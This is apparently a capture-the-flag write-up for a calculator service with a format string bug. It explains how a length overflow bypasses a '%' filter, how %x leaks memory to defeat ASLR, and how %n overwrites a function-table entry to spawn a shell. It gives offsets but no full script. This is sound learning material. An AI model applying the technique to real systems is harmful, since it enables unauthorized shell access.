I almost forget how to use format string vulnerability attack......
After connecting the server, we can get the message like that:
Welcome to Multipurpose Calculation Machine!
[add] Choose the number of parameters: 1
[add] Provide parameter 1: 1
[add] Message of the day: Don't cry because it's over, smile because it happened. -- Dr. Seuss, operands: 
[add] The sum of provided numbers is 1
Expect the choice, the problem uses
scanf("%u") to get users input. So there hasn't bof to overwrite memorys. In each choice, the programe uses
printf(format) to print "Message of day" and "operands". The length of
format is 308 bytes. And the problem runs a for loop which counts to 308 and checks whether
It seems to prevent the format string attack. However, if the length of "Message of day" + "operand" + others is bigger than 308, it will cause the end of string
\0 be overwrite. Luckily, the input of choice is behind of
format. Thus, we can bypass the filter of
% symbol and use the format string vulnerability.
Then we use
%x to leak the memory, and notice the program uses ASLR protection. We must calculate the base by subtracting 0x3b00. Then using
%n to overwrite memory. I try to overwrite return address at first, but it's not work. I use GDB to trace the program , it execute
system('/bin/sh') indeed. However it doesn't open shell. So I decide to try another way.
main function will dynamic execute the function that maps to each choice. The function table is started at 0x3b00. I decide to overwrite
quit choice, it is at 0x3b80 and its value is 0x1fea. After overwriting it to 0x0d20,we can type
quit and get the shell.